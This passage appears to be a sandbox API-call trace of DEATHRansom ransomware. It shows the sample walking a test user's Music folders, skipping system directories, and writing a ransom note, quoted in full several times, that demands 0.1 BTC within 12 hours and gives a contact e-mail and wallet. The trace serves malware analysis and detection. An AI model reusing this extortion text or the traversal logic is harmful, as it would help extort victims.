HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\read_me.txt") returned 84 [0075.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.772] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.772] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.772] CloseHandle (hObject=0x7b8) returned 1 [0075.773] GetProcessHeap () returned 0x4f10000 [0075.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d410b0 | out: hHeap=0x4f10000) returned 1 [0075.773] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b3a0d90, ftCreationTime.dwHighDateTime=0x1d4c5bf, ftLastAccessTime.dwLowDateTime=0xfc8619c0, ftLastAccessTime.dwHighDateTime=0x1d4d08d, ftLastWriteTime.dwLowDateTime=0xfc8619c0, ftLastWriteTime.dwHighDateTime=0x1d4d08d, nFileSizeHigh=0x0, nFileSizeLow=0x8a6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SbWQphpdQ.m4a", cAlternateFileName="SBWQPH~1.M4A")) returned 1 [0075.773] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\SbWQphpdQ.m4a") returned 68 [0075.773] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0xe4735eb0, ftLastAccessTime.dwHighDateTime=0x1d4d0d3, ftLastWriteTime.dwLowDateTime=0xe4735eb0, ftLastWriteTime.dwHighDateTime=0x1d4d0d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wmMLxSh", cAlternateFileName="")) returned 1 [0075.773] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh") returned 62 [0075.773] lstrcmpW (lpString1="wmMLxSh", lpString2="..") returned 1 [0075.773] lstrcmpW (lpString1="wmMLxSh", lpString2=".") returned 1 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="programdata") returned 0x0 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="$recycle.bin") returned 0x0 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="program files") returned 0x0 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="windows") returned 0x0 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="all users") returned 0x0 [0075.773] StrStrW (lpFirst="wmmlxsh", lpSrch="appdata") returned 0x0 [0075.773] GetProcessHeap () returned 0x4f10000 [0075.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d410b0 [0075.773] lstrcpyW (in: lpString1=0x8d410b0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh" [0075.773] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 75 [0075.773] QueueUserWorkItem (Function=0x40a710, Context=0x8d410b0, Flags=0x0) returned 1 [0075.773] GetProcessHeap () returned 0x4f10000 [0075.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.773] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\*") returned 64 [0075.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0xe4735eb0, ftLastAccessTime.dwHighDateTime=0x1d4d0d3, ftLastWriteTime.dwLowDateTime=0xe4735eb0, ftLastWriteTime.dwHighDateTime=0x1d4d0d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.773] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\.") returned 64 [0075.773] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0xe4735eb0, ftLastAccessTime.dwHighDateTime=0x1d4d0d3, ftLastWriteTime.dwLowDateTime=0xe4735eb0, ftLastWriteTime.dwHighDateTime=0x1d4d0d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\..") returned 65 [0075.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6910e790, ftCreationTime.dwHighDateTime=0x1d4c617, ftLastAccessTime.dwLowDateTime=0x6decac40, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0x6decac40, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xc889, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="brapnx BzMk5C.mp3", cAlternateFileName="BRAPNX~1.MP3")) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\brapnx BzMk5C.mp3") returned 80 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac715430, ftCreationTime.dwHighDateTime=0x1d4c972, ftLastAccessTime.dwLowDateTime=0xc044fa10, ftLastAccessTime.dwHighDateTime=0x1d4d2b0, ftLastWriteTime.dwLowDateTime=0xc044fa10, ftLastWriteTime.dwHighDateTime=0x1d4d2b0, nFileSizeHigh=0x0, nFileSizeLow=0x2fe1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="j06Qfw1.m4a", cAlternateFileName="")) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\j06Qfw1.m4a") returned 74 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec089880, ftCreationTime.dwHighDateTime=0x1d4cd49, ftLastAccessTime.dwLowDateTime=0xcfbffa80, ftLastAccessTime.dwHighDateTime=0x1d4c932, ftLastWriteTime.dwLowDateTime=0xcfbffa80, ftLastWriteTime.dwHighDateTime=0x1d4c932, nFileSizeHigh=0x0, nFileSizeLow=0xd358, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PtDamlq6EPCO4.mp3", cAlternateFileName="PTDAML~1.MP3")) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\PtDamlq6EPCO4.mp3") returned 80 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cbb9510, ftCreationTime.dwHighDateTime=0x1d4c61b, ftLastAccessTime.dwLowDateTime=0x3d109320, ftLastAccessTime.dwHighDateTime=0x1d4cccf, ftLastWriteTime.dwLowDateTime=0x3d109320, ftLastWriteTime.dwHighDateTime=0x1d4cccf, nFileSizeHigh=0x0, nFileSizeLow=0x1386d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zY1gAR74jXX.mp3", cAlternateFileName="ZY1GAR~1.MP3")) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\zY1gAR74jXX.mp3") returned 78 [0075.774] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cbb9510, ftCreationTime.dwHighDateTime=0x1d4c61b, ftLastAccessTime.dwLowDateTime=0x3d109320, ftLastAccessTime.dwHighDateTime=0x1d4cccf, ftLastWriteTime.dwLowDateTime=0x3d109320, ftLastWriteTime.dwHighDateTime=0x1d4cccf, nFileSizeHigh=0x0, nFileSizeLow=0x1386d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zY1gAR74jXX.mp3", cAlternateFileName="ZY1GAR~1.MP3")) returned 0 [0075.774] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.774] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\read_me.txt") returned 74 [0075.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.775] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.775] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.775] CloseHandle (hObject=0x7b8) returned 1 [0075.776] GetProcessHeap () returned 0x4f10000 [0075.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0075.776] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0xe4735eb0, ftLastAccessTime.dwHighDateTime=0x1d4d0d3, ftLastWriteTime.dwLowDateTime=0xe4735eb0, ftLastWriteTime.dwHighDateTime=0x1d4d0d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wmmlxsh", cAlternateFileName="")) returned 0 [0075.776] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.776] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\read_me.txt") returned 66 [0075.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.776] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.776] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.777] CloseHandle (hObject=0x7b4) returned 1 [0075.777] GetProcessHeap () returned 0x4f10000 [0075.777] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d01090 | out: hHeap=0x4f10000) returned 1 [0075.777] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x4046d4f0, ftLastAccessTime.dwHighDateTime=0x1d4d490, ftLastWriteTime.dwLowDateTime=0x4046d4f0, ftLastWriteTime.dwHighDateTime=0x1d4d490, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="6sJ5Nvd", cAlternateFileName="")) returned 1 [0075.777] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd") returned 47 [0075.777] lstrcmpW (lpString1="6sJ5Nvd", lpString2="..") returned 1 [0075.777] lstrcmpW (lpString1="6sJ5Nvd", lpString2=".") returned 1 [0075.777] StrStrW (lpFirst="6sj5nvd", lpSrch="programdata") returned 0x0 [0075.777] StrStrW (lpFirst="6sj5nvd", lpSrch="$recycle.bin") returned 0x0 [0075.777] StrStrW (lpFirst="6sj5nvd", lpSrch="program files") returned 0x0 [0075.777] StrStrW (lpFirst="6sj5nvd", lpSrch="windows") returned 0x0 [0075.777] StrStrW (lpFirst="6sj5nvd", lpSrch="all users") returned 0x0 [0075.778] StrStrW (lpFirst="6sj5nvd", lpSrch="appdata") returned 0x0 [0075.778] GetProcessHeap () returned 0x4f10000 [0075.778] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d01090 [0075.778] lstrcpyW (in: lpString1=0x8d01090, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd" [0075.778] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 76 [0075.778] QueueUserWorkItem (Function=0x40a710, Context=0x8d01090, Flags=0x0) returned 1 [0075.778] GetProcessHeap () returned 0x4f10000 [0075.778] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.778] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\*") returned 49 [0075.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x4046d4f0, ftLastAccessTime.dwHighDateTime=0x1d4d490, ftLastWriteTime.dwLowDateTime=0x4046d4f0, ftLastWriteTime.dwHighDateTime=0x1d4d490, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.778] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\.") returned 49 [0075.778] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.778] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.778] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x4046d4f0, ftLastAccessTime.dwHighDateTime=0x1d4d490, ftLastWriteTime.dwLowDateTime=0x4046d4f0, ftLastWriteTime.dwHighDateTime=0x1d4d490, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.778] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\..") returned 50 [0075.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.778] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31bbe620, ftCreationTime.dwHighDateTime=0x1d4d263, ftLastAccessTime.dwLowDateTime=0x14809f60, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x14809f60, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0x5c21, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AmZPmY.wav", cAlternateFileName="")) returned 1 [0075.778] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\AmZPmY.wav") returned 58 [0075.778] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31bbe620, ftCreationTime.dwHighDateTime=0x1d4d263, ftLastAccessTime.dwLowDateTime=0x14809f60, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x14809f60, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0x5c21, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AmZPmY.wav", cAlternateFileName="")) returned 0 [0075.778] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.778] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\read_me.txt") returned 59 [0075.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sj5nvd\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.821] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 